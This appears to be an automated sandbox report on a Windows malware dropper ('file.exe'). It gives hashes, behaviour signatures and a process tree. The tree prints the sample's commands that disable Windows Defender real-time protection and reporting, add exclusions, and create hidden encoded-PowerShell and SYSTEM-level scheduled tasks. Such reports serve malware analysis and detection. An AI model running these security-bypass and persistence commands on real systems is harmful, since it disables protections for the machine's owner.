Analysis
-
max time kernel
151s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
09-02-2023 05:21
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
58cb96288d8ada838c2187dc9bd21fae
-
SHA1
56da68afe24c9d93ed7f0153c6550e5a357c0ba6
-
SHA256
a02fc41c21e5cf0aa8919198cb3dc7e93bbbf7fb0b6ae8bc4c97332818b0dde1
-
SHA512
010c64a79c90aefdbd1190e2b032cb601f588cb384ad6246c5dc454ed888225dd2792e7a6ab90cbadec286e340b98635a230e6a9230b92479981514ab022dbdf
-
SSDEEP
196608:91O8S2nXipTV2dErfoR7lfYhhKesL/QOtP7uvBr+jFq7F:3O5Yifm7lfWhKesL/QYDArQq7F
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exereg.exereg.exereg.execonhost.exereg.exereg.exereg.exereg.exereg.exereg.execonhost.exereg.exereg.exereg.execonhost.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LtFzXrdCXcavHaVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IwGFDhhTU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dMFexHHRtytWC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tmuWEvHsDLUn = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dMFexHHRtytWC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LtFzXrdCXcavHaVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IwGFDhhTU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MLrIJeslOBZU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MLrIJeslOBZU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tmuWEvHsDLUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Executes dropped EXE 3 IoCs
Processes:
Install.exeInstall.exebpisjHu.exepid process 2020 Install.exe 612 Install.exe 1816 bpisjHu.exe -
Loads dropped DLL 8 IoCs
Processes:
file.exeInstall.exeInstall.exepid process 1896 file.exe 2020 Install.exe 2020 Install.exe 2020 Install.exe 2020 Install.exe 612 Install.exe 612 Install.exe 612 Install.exe -
Drops file in System32 directory 7 IoCs
Processes:
powershell.EXEbpisjHu.exepowershell.EXEInstall.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol bpisjHu.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol bpisjHu.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini bpisjHu.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bsXFoBxfaHoLLxRHnd.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1680 schtasks.exe 912 schtasks.exe 684 schtasks.exe 912 schtasks.exe 1432 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 9 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpid process 564 powershell.EXE 564 powershell.EXE 564 powershell.EXE 2016 powershell.EXE 2016 powershell.EXE 2016 powershell.EXE 832 powershell.EXE 832 powershell.EXE 832 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEdescription pid process Token: SeDebugPrivilege 564 powershell.EXE Token: SeDebugPrivilege 2016 powershell.EXE Token: SeDebugPrivilege 832 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.execmd.exeforfiles.execmd.exedescription pid process target process PID 1896 wrote to memory of 2020 1896 file.exe Install.exe PID 1896 wrote to memory of 2020 1896 file.exe Install.exe PID 1896 wrote to memory of 2020 1896 file.exe Install.exe PID 1896 wrote to memory of 2020 1896 file.exe Install.exe PID 1896 wrote to memory of 2020 1896 file.exe Install.exe PID 1896 wrote to memory of 2020 1896 file.exe Install.exe PID 1896 wrote to memory of 2020 1896 file.exe Install.exe PID 2020 wrote to memory of 612 2020 Install.exe Install.exe PID 2020 wrote to memory of 612 2020 Install.exe Install.exe PID 2020 wrote to memory of 612 2020 Install.exe Install.exe PID 2020 wrote to memory of 612 2020 Install.exe Install.exe PID 2020 wrote to memory of 612 2020 Install.exe Install.exe PID 2020 wrote to memory of 612 2020 Install.exe Install.exe PID 2020 wrote to memory of 612 2020 Install.exe Install.exe PID 612 wrote to memory of 996 612 Install.exe forfiles.exe PID 612 wrote to memory of 996 612 Install.exe forfiles.exe PID 612 wrote to memory of 996 612 Install.exe forfiles.exe PID 612 wrote to memory of 996 612 Install.exe forfiles.exe PID 612 wrote to memory of 996 612 Install.exe forfiles.exe PID 612 wrote to memory of 996 612 Install.exe forfiles.exe PID 612 wrote to memory of 996 612 Install.exe forfiles.exe PID 612 wrote to memory of 684 612 Install.exe forfiles.exe PID 612 wrote to memory of 684 612 Install.exe forfiles.exe PID 612 wrote to memory of 684 612 Install.exe forfiles.exe PID 612 wrote to memory of 684 612 Install.exe forfiles.exe PID 612 wrote to memory of 684 612 Install.exe forfiles.exe PID 612 wrote to memory of 684 612 Install.exe forfiles.exe PID 612 wrote to memory of 684 612 Install.exe forfiles.exe PID 996 wrote to memory of 1260 996 forfiles.exe cmd.exe PID 996 wrote to memory of 1260 996 forfiles.exe cmd.exe PID 996 wrote to memory of 1260 996 forfiles.exe cmd.exe PID 996 wrote to memory of 1260 996 forfiles.exe cmd.exe PID 996 wrote to memory of 1260 996 forfiles.exe cmd.exe PID 996 wrote to memory of 1260 996 forfiles.exe cmd.exe PID 996 wrote to memory of 1260 996 forfiles.exe cmd.exe PID 1260 wrote to memory of 1620 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1620 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1620 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1620 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1620 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1620 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1620 1260 cmd.exe reg.exe PID 684 wrote to memory of 1152 684 forfiles.exe cmd.exe PID 684 wrote to memory of 1152 684 forfiles.exe cmd.exe PID 684 wrote to memory of 1152 684 forfiles.exe cmd.exe PID 684 wrote to memory of 1152 684 forfiles.exe cmd.exe PID 684 wrote to memory of 1152 684 forfiles.exe cmd.exe PID 684 wrote to memory of 1152 684 forfiles.exe cmd.exe PID 684 wrote to memory of 1152 684 forfiles.exe cmd.exe PID 1260 wrote to memory of 1732 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1732 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1732 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1732 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1732 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1732 1260 cmd.exe reg.exe PID 1260 wrote to memory of 1732 1260 cmd.exe reg.exe PID 1152 wrote to memory of 1728 1152 cmd.exe reg.exe PID 1152 wrote to memory of 1728 1152 cmd.exe reg.exe PID 1152 wrote to memory of 1728 1152 cmd.exe reg.exe PID 1152 wrote to memory of 1728 1152 cmd.exe reg.exe PID 1152 wrote to memory of 1728 1152 cmd.exe reg.exe PID 1152 wrote to memory of 1728 1152 cmd.exe reg.exe PID 1152 wrote to memory of 1728 1152 cmd.exe reg.exe PID 1152 wrote to memory of 1812 1152 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSE9C4.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSEED2.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFHhEAAbA" /SC once /ST 04:40:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFHhEAAbA"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFHhEAAbA"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bsXFoBxfaHoLLxRHnd" /SC once /ST 06:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exe\" Y9 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {C891A8B2-5A95-4BC7-AE78-347E883BE935} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {B1E91904-F896-4FDE-992A-C35EE5D6E9A8} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exeC:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exe Y9 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcOVckcwJ" /SC once /ST 03:36:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcOVckcwJ"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcOVckcwJ"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHGRxwhdY" /SC once /ST 02:54:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHGRxwhdY"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHGRxwhdY"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\KgqoRVUGdWyiycxE\ojrmovpe\cbqmByRxaocLcUyp.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\KgqoRVUGdWyiycxE\ojrmovpe\cbqmByRxaocLcUyp.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLrIJeslOBZU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLrIJeslOBZU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dMFexHHRtytWC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dMFexHHRtytWC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tmuWEvHsDLUn" /t REG_DWORD /d 0 /reg:324⤵
-
